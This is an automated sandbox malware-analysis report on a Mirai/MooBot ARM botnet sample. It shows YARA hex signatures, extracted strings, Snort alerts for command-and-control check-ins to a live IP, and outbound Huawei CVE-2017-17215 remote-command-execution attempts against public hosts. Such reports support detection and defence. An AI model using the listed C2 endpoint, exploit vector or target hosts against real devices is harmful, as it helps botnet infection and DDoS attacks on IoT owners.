Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
skyljne.arm5.elf

Overview

General Information

Sample name:skyljne.arm5.elf
Analysis ID:1373931
MD5:3e4f991a16e5c2859944311aa34a93c0
SHA1:628feb2555e6fe2ceb85676fb21ece2133de4161
SHA256:6fc3c3b2019f7b45b78e623adc872986817da0427d273a9bb04c0c44ed8befc6
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox version:38.0.0 Ammolite
Analysis ID:1373931
Start date and time:2024-01-12 18:15:02 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 19s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:skyljne.arm5.elf
Detection:MAL
Classification:mal100.troj.linELF@0/1025@19/0
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: skyljne.arm5.elf
Command:/tmp/skyljne.arm5.elf
PID:6204
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 6218, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 6218, Parent: 1477, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • gdm3 New Fork (PID: 6226, Parent: 1320)
  • Default (PID: 6226, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6246, Parent: 1320)
  • Default (PID: 6246, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
skyljne.arm5.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    skyljne.arm5.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      skyljne.arm5.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x1b7a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b7b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b7cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b7e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b7f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b808:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b81c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b830:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b844:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b858:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b86c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b880:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b894:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b8a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b8bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b8d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b8e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b8f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b90c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b920:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b934:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      6204.1.00007f36fc017000.00007f36fc037000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        6204.1.00007f36fc017000.00007f36fc037000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6204.1.00007f36fc017000.00007f36fc037000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x1b7a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b7b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b7cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b7e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b7f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b808:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b81c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b830:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b844:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b858:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b86c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b880:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b894:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b8a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b8bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b8d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b8e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b8f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b90c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b920:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b934:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: skyljne.arm5.elf PID: 6204JoeSecurity_Mirai_3Yara detected MiraiJoe Security
            Process Memory Space: skyljne.arm5.elf PID: 6204Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0xd5e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xd72:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xd86:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xd9a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xdae:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xdc2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xdd6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xdea:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xdfe:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xe12:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xe26:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xe3a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xe4e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xe62:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xe76:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xe8a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xe9e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xeb2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xec6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xeda:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0xeee:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            Timestamp:192.168.2.23103.245.236.18850686199902030490 01/12/24-18:16:09.765988
            SID:2030490
            Source Port:50686
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.245.236.18860948199902030490 01/12/24-18:16:20.630778
            SID:2030490
            Source Port:60948
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2366.51.122.23647172372152829579 01/12/24-18:16:33.430619
            SID:2829579
            Source Port:47172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2341.232.240.9238504372152835222 01/12/24-18:17:22.599879
            SID:2835222
            Source Port:38504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.245.236.18844704199902030490 01/12/24-18:17:28.968431
            SID:2030490
            Source Port:44704
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.245.236.18843668199902030490 01/12/24-18:16:31.307779
            SID:2030490
            Source Port:43668
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.245.236.18856188199902030490 01/12/24-18:16:43.997725
            SID:2030490
            Source Port:56188
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.245.236.18847242199902030490 01/12/24-18:15:59.038442
            SID:2030490
            Source Port:47242
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2345.42.94.7656890372152829579 01/12/24-18:16:45.736911
            SID:2829579
            Source Port:56890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2341.232.240.9238504372152829579 01/12/24-18:17:22.599879
            SID:2829579
            Source Port:38504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.245.236.18846862199902030490 01/12/24-18:15:42.360431
            SID:2030490
            Source Port:46862
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.245.236.18842186199902030490 01/12/24-18:16:57.712738
            SID:2030490
            Source Port:42186
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2394.122.89.17157056372152835222 01/12/24-18:17:19.312322
            SID:2835222
            Source Port:57056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.245.236.18847092199902030490 01/12/24-18:15:50.190170
            SID:2030490
            Source Port:47092
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2345.42.94.7656890372152835222 01/12/24-18:16:45.736911
            SID:2835222
            Source Port:56890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.245.236.18851078199902030490 01/12/24-18:16:39.149952
            SID:2030490
            Source Port:51078
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.245.236.18841732199902030490 01/12/24-18:16:29.471258
            SID:2030490
            Source Port:41732
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.245.236.18852482199902030490 01/12/24-18:17:08.402841
            SID:2030490
            Source Port:52482
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.245.236.18847580199902030490 01/12/24-18:16:06.899012
            SID:2030490
            Source Port:47580
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.245.236.18839018199902030490 01/12/24-18:16:54.850745
            SID:2030490
            Source Port:39018
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2366.51.122.23647172372152835222 01/12/24-18:16:33.430619
            SID:2835222
            Source Port:47172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.245.236.18850424199902030490 01/12/24-18:17:06.552546
            SID:2030490
            Source Port:50424
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2394.122.89.17157056372152829579 01/12/24-18:17:19.312322
            SID:2829579
            Source Port:57056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.245.236.18837772199902030490 01/12/24-18:17:22.105561
            SID:2030490
            Source Port:37772
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.245.236.18856532199902030490 01/12/24-18:17:12.270460
            SID:2030490
            Source Port:56532
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: skyljne.arm5.elfAvira: detected
            Source: skyljne.arm5.elfReversingLabs: Detection: 57%
            Source: skyljne.arm5.elfString: Content-Length: /proc/proc/%d/cmdlinenetstatcurlechocatbin/busyboxbusybox wget/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/tmp/boot/proc/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystemcundicundi.*var/Condibin/Condibin/babylonetop1hbttop1hbt./root/dvr_gui//root/dvr_app//anko-app/902i13BzSxLxBxeYHOHO-LUGO7HOHO-U79OLJuYfouyf87NiGGeR69xdSO190Ij1XLOLKIKEEEDDEekjheory98escansh4MDMAfdevalvexscanspcMELTEDNINJAREALZflexsonskidsscanx86MISAKI-U79OLfoAxi102kxeswodjwodjwojMmKiy7f87lfreecookiex86sysgpufrgegesysupdater0DnAzepdNiGGeRD0nks69frgreu0x766f6964NiGGeRd0nks1337gafturasgbsigboa120i3UI49OaF3geaevaiolmao123123aOfurain0n4H34DggTrexewwasads1293194hjXDOthLaLosnggtwget-log1337SoraLOADERSAIAKINAggtq1378bfp919GRB1Q2SAIAKUSOggtr14FaSEXSLAVE1337ggtt1902a3u912u3u4haetrghbr19ju3dSORAojkf120hehahejeje922U2JDJA901F91SlaVLav12helpmedaddthhhhh2wgg9qphbqSlav3Th3seD3viceshzSmYZjYMQ5GbfsoraSoRAxD123LOLiaGv5aA3SoRAxD420LOLinsomni640277SoraBeReppin1337ipcamCache66tlGg9QjUYfouyf876ke3TOKYO3lyEeaXul2dULCVxh93OfjHZ2zTY2gD6MZvKc7KU6rmMkiy6f87lA023UU4U24UIUTheWeekndmioribitchesA5p9TheWeekndsmnblkjpoiAbAdTokyosnebAkiruU8inTznetstatsAlexW9RCAKM20TnewnetwordAyo215WordnloadsBAdAsVWordmanenotyakuzaaBelchWordnetsobpBigN0gg0r420X0102I34fofhasfhiafhoiX19I239124UIUoismXSHJEHHEIIHWOolsVNwo12DeportedDeportedXkTer0GbA1onry0v03FortniteDownLOLZY0urM0mGaypussyfartlmaojkGrAcEnIgGeRaNnYvdGkqndCOqGeoRBe6BEGuiltyCrownZEuS69s4beBsEQhdHOHO-KSNDOZEuz69sat1234aj93hJ23scanHAalie293z0k2LscanJoshoARMHellInSideayyyGangShitscanJoshoARM5HighFryb1glscanJoshoARM6IWhPyucDbJboatnetzscanJoshoARM7IuYgujeIqnbtbatrtahzexsexscanJoshoM68KJJDUHEWBBBIBscanJoshoMIPSJSDGIEVIVAVIGcKbVkzGOPascanJoshoMPSLccADscanJoshoPPCKAZEN-OIU97chickenxingsscanJoshoSH4yakuskzm8KAZEN-PO78HcleanerscanJoshoSPCKAZEN-U79OLdbeefscanJoshoX86yakuz4c24KETASHI32ddrwelperscanarm5zPnr6HpQj2Kaishi-Iz90Ydeexecscanarm6zdrtfxcgyKatrina32doCP3fVjscanarm7zxcfhuioKsif91je39scanm68kKuasadvrhelperl33t_feetl33tl33tfeetscanmipsKuasaBinsMateeQnOhRk85rscanmpslLOLHHHOHOHBUIeXK20CL12ZnyamezyQBotBladeSPOOKYhikariwasherep4029x91xx32uhj4gbejhwizardzhra.outboatnetdbgcondiheroshimaskid.dbglzrdPownedSecurity69.aresfxlyazsxhyUNSTABLEunstable_is_the_story_of_the_universemoobotjnsd9sdoilayourmomgaeissdfjiougsiojOasisSEGRJIJHFVNHSNHEIHFOSapep999KOWAI-BAdAsVKOWAI-SADjHKipU7Ylairdropmalwareyour_verry_fucking_gayBig-Bro-Brightsefaexecshirololieagle.For-Gai-Mezy0x6axNLcloqkisvspookymythSwergjmioGKILLEJW(IU(JIWERGFJGJWJRGHetrhwewrtheIuFdKssCxzjSDFJIjioOnrYoXd666ewrtkjokethajbdf89wu823AAaasrdgsWsGA4@F6FGhostWuzHere666BOGOMIPSbeastmodedvrHelperbestmodesfc6aJfIuYDemon.xeno-is-godICY-P-0ODIJgSHUIHIfhwrgLhu87VhvQPzlunadakuexecbinT

            Networking

            barindex
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:46862 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:47092 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:47242 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:47580 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:50686 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:60948 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:41732 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:43668 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47172 -> 66.51.122.236:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47172 -> 66.51.122.236:37215
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:51078 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:56188 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56890 -> 45.42.94.76:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56890 -> 45.42.94.76:37215
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:39018 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:42186 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:50424 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:52482 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:56532 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57056 -> 94.122.89.171:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57056 -> 94.122.89.171:37215
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:37772 -> 103.245.236.188:19990
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38504 -> 41.232.240.92:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38504 -> 41.232.240.92:37215
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:44704 -> 103.245.236.188:19990
            Source: unknownNetwork traffic detected: HTTP traffic on port 47172 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56890 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56890 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56890 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56890 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56890 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56890 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56890 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57056 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57056 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57056 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 38504 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 38504
            Source: unknownNetwork traffic detected: HTTP traffic on port 57056 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57056 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57056 -> 37215
            Source: global trafficTCP traffic: 192.168.2.23:20655 -> 47.168.129.149:37215
            Source: global trafficTCP traffic: 192.168.2.23:20655 -> 98.161.82.110:37215
            Source: global trafficTCP traffic: 192.168.2.23:20655 -> 217.32.205.138:37215
            Source: global trafficTCP traffic: 192.168.2.23:20655 -> 123.67.14.39:37215
            Source: global trafficTCP traffic: 192.168.2.23:20655 -> 41.47.130.56:37215
            Source: global trafficTCP traffic: 192.168.2.23:20655 -> 197.248.6.28:37215
            Source: global trafficTCP traffic: 192.168.2.23:20655 -> 41.88.166.218:37215
